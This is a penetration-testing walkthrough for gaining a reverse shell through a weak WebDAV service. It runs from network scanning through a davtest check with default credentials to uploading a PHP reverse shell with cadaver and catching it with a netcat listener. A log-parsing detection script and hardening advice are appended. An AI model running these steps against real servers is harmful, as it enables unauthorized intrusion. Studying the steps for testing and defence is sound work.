In-Depth Steps for WebDAV Exploitation
WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.
Information Gathering
Step 0: Check Router IP from eth0 on your Kali Machine
    ip addr
Example Results:
    inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
Step 1: Quick arp-scan
    arp-scan 192.168.1.1/24
Example Results:
    192.168.1.3   02:f9:8e:69:9e:55   (Unknown: locally administered)
    192.168.1.1   e0:19:54:46:e5:6e   zte corporation
    192.168.1.11  08:00:27:e7:c3:e8   PCS Systemtechnik GmbH
Step 2: Nmap Scan for All Ports and OS Detection
    nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt
Example Results:
    Discovered open port 2869/tcp on 192.168.1.3
    Discovered open port 7676/tcp on 192.168.1.11
    Discovered open port 23/tcp on 192.168.1.1
    // Also the open port 8585 for the WebDAV
    PORT     STATE SERVICE REASON         VERSION
    8585/tcp open  unknown syn-ack ttl 64
Nmap scan report for 192.168.1.11:
    OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
    TCP/IP fingerprint:
Step 3: Davtest for WebDAV
    davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads
Example Results:
    Testing DAV connection
    OPEN    SUCCEED:    http://192.168.1.11:8585/uploads
WebDAV Exploitation
Step 4: Copy PHP Reverse Shell to Desktop
    cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
Step 5: Edit PHP Reverse Shell
Edit /home/kali/Desktop/php-reverse-shell.php:
    $ip = '192.168.1.10';   // Kali machine IP
    $port = 7779;           // TCP/UDP Port
    $shell = 'cmd.exe';     // Use cmd.exe for Windows
Step 6: Start Netcat Listener on Kali
    nc -lvnp 7779
Step 7: Upload PHP Reverse Shell Using Cadaver
    cadaver http://192.168.1.11:8585/uploads
    dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php
Step 8: Check Netcat Listener for Shell
    nc -lnvp 7779
Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.
Explanation:
- Information Gathering:
  - Step 0: Check the router IP to identify the local network's subnet.
  - Step 1: Use arp-scan to discover active hosts on the network.
  - Step 2: Perform an Nmap scan to find open ports and detect the operating system.
- WebDAV Exploitation:
  - Step 3: Use davtest to verify that the WebDAV service is accessible.
  - Step 4: Copy a PHP reverse shell script to the attacker's machine.
  - Step 5: Edit the PHP script with the attacker's IP and desired port.
  - Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
  - Step 7: Upload the modified PHP script to the target using Cadaver.
  - Step 8: Check the Netcat listener for a successful reverse shell.
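What Steps 7 and 8 look like from the server side, as an added example that is not part of the original guide: it scans access-log lines for a successful WebDAV PUT of a PHP file and any later request for that same path. The Apache log format, the extension list, the alert names, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re

# Apache common/combined log format is assumed; only the needed fields are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions a PHP handler commonly executes (assumed list; match it to the server config).
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)

# Constructed sample lines modelled on the walkthrough's hosts and upload path.
SAMPLE_LOG = [
    '192.168.1.10 - admin [10/Jan/2024:10:00:01 +0000] "PROPFIND /uploads/ HTTP/1.1" 207 1024',
    '192.168.1.10 - admin [10/Jan/2024:10:00:05 +0000] "PUT /uploads/php-reverse-shell.php HTTP/1.1" 201 0',
    '192.168.1.10 - - [10/Jan/2024:10:00:09 +0000] "GET /uploads/php-reverse-shell.php HTTP/1.1" 200 0',
    '192.168.1.3 - admin [10/Jan/2024:10:01:00 +0000] "PUT /uploads/report.docx HTTP/1.1" 201 0',
    '192.168.1.3 - - [10/Jan/2024:10:02:00 +0000] "PUT /uploads/x.php HTTP/1.1" 401 0',
]


def find_dav_script_uploads(lines):
    """Return (kind, client, user, path) alerts for scripts written via PUT and later requested."""
    alerts, uploaded = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        path = m["path"].split("?", 1)[0]
        key = path.lower()  # the target in the walkthrough is Windows: paths are case-insensitive
        succeeded = m["status"].startswith("2")
        if m["method"] == "PUT" and succeeded and EXEC_EXT.search(path):
            uploaded.add(key)
            alerts.append(("script-upload", m["client"], m["user"], path))
        elif m["method"] in ("GET", "POST") and succeeded and key in uploaded:
            # A request for a freshly uploaded script is what makes the server run it.
            alerts.append(("script-requested", m["client"], m["user"], path))
    # Limitation: MOVE/COPY renames put the target name in the Destination header,
    # which the default log format does not record, so they are not covered here.
    return alerts


if __name__ == "__main__":
    for alert in find_dav_script_uploads(SAMPLE_LOG):
        print(alert)
```

The durable fix is on the server: strong WebDAV credentials, and no script handler mapped for the directory that accepts uploads.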
Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.